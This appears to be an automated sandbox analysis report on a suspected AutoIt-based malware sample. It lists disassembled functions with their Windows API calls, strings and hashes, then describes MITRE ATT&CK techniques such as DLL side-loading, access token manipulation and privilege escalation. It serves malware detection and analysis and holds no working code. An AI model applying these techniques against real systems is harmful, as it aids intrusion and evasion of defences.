Instruction ID: 9d85bd5a73601396813d2215ffab5430875e83b900dd91c9d49abf55c89b9706
Opcode Fuzzy Hash: e23e8e0835f42d571231cbd8bbff9a03cb9e3f6c2c8b8f672983a965e9f7df88
Instruction Fuzzy Hash: 7D310471408360AEC761FB24DC46FEBB7D9AB41350F00452EF59983291EB749A49CBDA

Function 007331EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0073327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00733287

Strings

Combobox, xrefs: 00733249

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 80ff142f0180c3eadb1b048b1c4e0e4c49b356d9245d7093901fd99a9c210b6c
Instruction ID: d656f0d648cca27ed5edef75a0d3f104a82580140acc889cdff4c24a0d6cd8b2
Opcode Fuzzy Hash: 80ff142f0180c3eadb1b048b1c4e0e4c49b356d9245d7093901fd99a9c210b6c
Instruction Fuzzy Hash: 1C11B271300208BFFF259E54DC85EBB376AFB943A4F104228F9189B292D6799D518B60

Function 00733710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 006A600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006A604C
Part of subcall function 006A600E: GetStockObject.GDI32(00000011), ref: 006A6060
Part of subcall function 006A600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 006A606A

GetWindowRect.USER32(00000000,?), ref: 0073377A
GetSysColor.USER32(00000012), ref: 00733794

Strings

static, xrefs: 00733757

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 8938b27d672b622aba348ddfe525119fc029c81fd2b4a73af667b70d47a17637
Instruction ID: 0f02cc29e91ff60009b56d32336371a543b1772bdf16210bbdef576eb218b406
Opcode Fuzzy Hash: 8938b27d672b622aba348ddfe525119fc029c81fd2b4a73af667b70d47a17637
Instruction Fuzzy Hash: 15113AB2610209AFEF11DFB8CC46EFA7BB8FB09354F004518F955E2251D739E8619B50

Function 0071CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0071CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0071CDA6

Strings

<local>, xrefs: 0071CD66

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: d5611ccf024b875ea371f7560577cebe58250e06c1e20ac77f06badf47ddd419
Instruction ID: d826f91e8164e0d40a33be94d004a9761df9b81b87a214f3b318d770ce0b24c9
Opcode Fuzzy Hash: d5611ccf024b875ea371f7560577cebe58250e06c1e20ac77f06badf47ddd419
Instruction Fuzzy Hash: 5F11C6B13856317AD7364BAA9C45EE7BE6CEF127A4F404226B589931C0D7789880D6F0

Function 00733429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 007334AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007334BA

Strings

edit, xrefs: 0073348F

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 032a9317d87f32e094d2b996f7224adf73b5d45a32df801df8a9cd171a72b331
Instruction ID: 6a4752b9bd628c76bc7483207769ade15b667a4e164ddd38758bb9721ce5fda9
Opcode Fuzzy Hash: 032a9317d87f32e094d2b996f7224adf73b5d45a32df801df8a9cd171a72b331
Instruction Fuzzy Hash: CE118C71100248ABFB228F64DC44ABB376AEB05374F508324F965A31E2C779EC919B64

Function 00706C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

CharUpperBuffW.USER32(?,?,?), ref: 00706CB6
_wcslen.LIBCMT ref: 00706CC2

Strings

STOP, xrefs: 00706CBC, 00706CC1

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: d9abb1b3361407d25ccb01bf838a0e367e5ddb6f80855d5f4f04fad5bd62deee
Instruction ID: d62c44138015cb7e813d5ad0481e7fe3c7554d8ff28cbfadafe9fa1f0b3bb63d
Opcode Fuzzy Hash: d9abb1b3361407d25ccb01bf838a0e367e5ddb6f80855d5f4f04fad5bd62deee
Instruction Fuzzy Hash: 8A010432600526CBDB20AFBDDCA09BF37F5EA617107100629E852D61D0EB39EC20C660

Function 00701BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

Part of subcall function 00703CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00703CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00701C46

Strings

ComboBox, xrefs: 00701BE5
ListBox, xrefs: 00701C10

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 5b05d2064cbd9e33cac4a32d07b56e565eacd67343c02660a3b994d22456dbed
Instruction ID: bc815129f9de1db41dea1faa9e7e9bd2fd416a79f76ed1abbb6fba9998c3d6e4
Opcode Fuzzy Hash: 5b05d2064cbd9e33cac4a32d07b56e565eacd67343c02660a3b994d22456dbed
Instruction Fuzzy Hash: 5B01F7B1680104E7EB08FB90C962DFF73E89B12340F500519B816732C2EA28DE4887B5

Function 00701C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

Part of subcall function 00703CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00703CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00701CC8

Strings

ComboBox, xrefs: 00701C69
ListBox, xrefs: 00701C94

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: e606b7689cd6abb94a1e665b599fde48c7406c49e8778b1d03baa0476dbed0a6
Instruction ID: 699e9114cdf13f06b5c503bc0da3cd8efcc4a4d415a416fd43a013b38ff0ae15
Opcode Fuzzy Hash: e606b7689cd6abb94a1e665b599fde48c7406c49e8778b1d03baa0476dbed0a6
Instruction Fuzzy Hash: 1A01DBB1640114E7EB04F790CA15EFF73EC9B12340F640519B806732C1EA28DF08D675

Function 006BA4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 006BA529

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

Strings

3yo, xrefs: 006BA545, 006BA54D, 006BA552
,%w, xrefs: 006BA509

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Init_thread_footer_wcslen
String ID: ,%w$3yo
API String ID: 2551934079-2742024474
Opcode ID: 4d63e15a9b4d1f9f8ba054ba9ebae6104b869b70ab1f66f0ab1361eadde4fd0e
Instruction ID: ee4f5bd71e4da42e349e96b56d8315903e9719f36d3230e36a5bddc59dfe892b
Opcode Fuzzy Hash: 4d63e15a9b4d1f9f8ba054ba9ebae6104b869b70ab1f66f0ab1361eadde4fd0e
Instruction Fuzzy Hash: 6D01F77270061497DA24F7A8D81BAED3397DB05750F50406CF516572C3DE149E828BAF

Function 00738172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00773018,0077305C), ref: 007381BF
CloseHandle.KERNEL32 ref: 007381D1

Strings

\0w, xrefs: 0073818A

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0w
API String ID: 3712363035-2344672426
Opcode ID: 3ecd2480ee3a11ffef7800158cf322f60cf33ae3a8c269de393054e0365e5d58
Instruction ID: 027307d08a05b4c24128c536850dd9d17de4fcefc19e8f939d3087dec99fabd6
Opcode Fuzzy Hash: 3ecd2480ee3a11ffef7800158cf322f60cf33ae3a8c269de393054e0365e5d58
Instruction Fuzzy Hash: 49F05EB2640304BAF6206761AC45FB73A5EDB05791F008425BB0CE51A2D67E8A50E3BD

Function 0072747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00727493
_wcslen.LIBCMT ref: 007274B9

Strings

3, 3, 16, 1, xrefs: 00727483

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 2dda1119b763f502f0c07759c560333b3ecbfe427bfc41b488aab71c0fd36c28
Instruction ID: d548fcea76ba1f3d0126bc40bbcd8332caba2db2eae15de1e3a7daf8deebef6e
Opcode Fuzzy Hash: 2dda1119b763f502f0c07759c560333b3ecbfe427bfc41b488aab71c0fd36c28
Instruction Fuzzy Hash: 11E02B026042B0509279327ABDC1EBF578ACFC5790710182FF981C2266EEA88D91D3E4

Function 00700B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00700B23

Strings

Error allocating memory., xrefs: 00700B1C
AutoIt, xrefs: 00700B17

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 56ef61634ef293710996fb4b3fa60c967ec13c3edcbbd188a255e49d4e585761
Instruction ID: b27f989f0bb24b3be928530f97b0950274c1b1f0a970affeacad3dc852357371
Opcode Fuzzy Hash: 56ef61634ef293710996fb4b3fa60c967ec13c3edcbbd188a255e49d4e585761
Instruction Fuzzy Hash: B5E0D87124431836E25137547C03FD97A858F05B21F10042EFB58654D38AD6689047ED

Function 006C0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 006BF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,006C0D71,?,?,?,006A100A), ref: 006BF7CE

IsDebuggerPresent.KERNEL32(?,?,?,006A100A), ref: 006C0D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,006A100A), ref: 006C0D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 006C0D7F

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 61ea630513973bc695a938c57b4741989a33917d0fe915728c8d3f44468dbf3f
Instruction ID: 8482a736767f329aea34eb69809c8853b1534e69e03d4064a3589a53ac118fc4
Opcode Fuzzy Hash: 61ea630513973bc695a938c57b4741989a33917d0fe915728c8d3f44468dbf3f
Instruction Fuzzy Hash: 05E06DB02003118BF3609FB8E8047527BE1FF00B81F00897DE886C6662DBB9F4848B91

Function 006BE398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 006BE3D5

Strings

8%w, xrefs: 006BE3CA
0%w, xrefs: 006BE3B5

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%w$8%w
API String ID: 1385522511-170289743
Opcode ID: deaaf342442e618434945774ce0856d6156ca2e5cad19b217696c0e80c35b117
Instruction ID: 07d72b40bd8fbb58b776ce04002d56d0c0df6be5624bb51b0cedc66a8bb86c4d
Opcode Fuzzy Hash: deaaf342442e618434945774ce0856d6156ca2e5cad19b217696c0e80c35b117
Instruction Fuzzy Hash: 67E02671448910CBCA049728B854ED83397EB04368B1091FCE12A872D3DB3D68C3874C

Function 006FD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 006FD220

Strings

%.3d, xrefs: 006FD22B
X64, xrefs: 006FD2A8

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: a8048da66445e3dc6ea9895ddcb8617a5dc981f9568c7ab8f5c191ece59beab1
Instruction ID: 5c94e97133705ebf4bc5e1842d1244b6981e0bca1c51310a0bb406a335778089
Opcode Fuzzy Hash: a8048da66445e3dc6ea9895ddcb8617a5dc981f9568c7ab8f5c191ece59beab1
Instruction Fuzzy Hash: BBD012E180810CE9CB9097D0CC458FAB37FBB08341F508452FB06A1040E628E64AA7A1

Function 00732356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0073236C
PostMessageW.USER32(00000000), ref: 00732373

Part of subcall function 0070E97B: Sleep.KERNEL32 ref: 0070E9F3

Strings

Shell_TrayWnd, xrefs: 00732365

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 746ddf131aa25be72839255e1b0a06a3ddbe5bfe4739ad03c0842e17e1ae8aeb
Instruction ID: 4ddda38d093197e64ff5760f1bef0da616df767a44edbbda5a617e4f73a86b3c
Opcode Fuzzy Hash: 746ddf131aa25be72839255e1b0a06a3ddbe5bfe4739ad03c0842e17e1ae8aeb
Instruction Fuzzy Hash: 25D0C972391310BAF665A770DC0FFC676549B05B11F508A567646BA1D0C9A8B8018B58

Function 00732322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0073232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0073233F

Part of subcall function 0070E97B: Sleep.KERNEL32 ref: 0070E9F3

Strings

Shell_TrayWnd, xrefs: 00732325

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 151dc7b74be48d65e009223d57b87ff2a8aa16a940d69d3d4273694e28c22c39
Instruction ID: 7c7511f28386dba0504acf84e60c52a219e631ad6035ec6a4aaee489897cec00
Opcode Fuzzy Hash: 151dc7b74be48d65e009223d57b87ff2a8aa16a940d69d3d4273694e28c22c39
Instruction Fuzzy Hash: 62D0C976394310F6E664A770DC0FFC67A549B00B11F108A567646BA1D0C9A8A8018B58

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

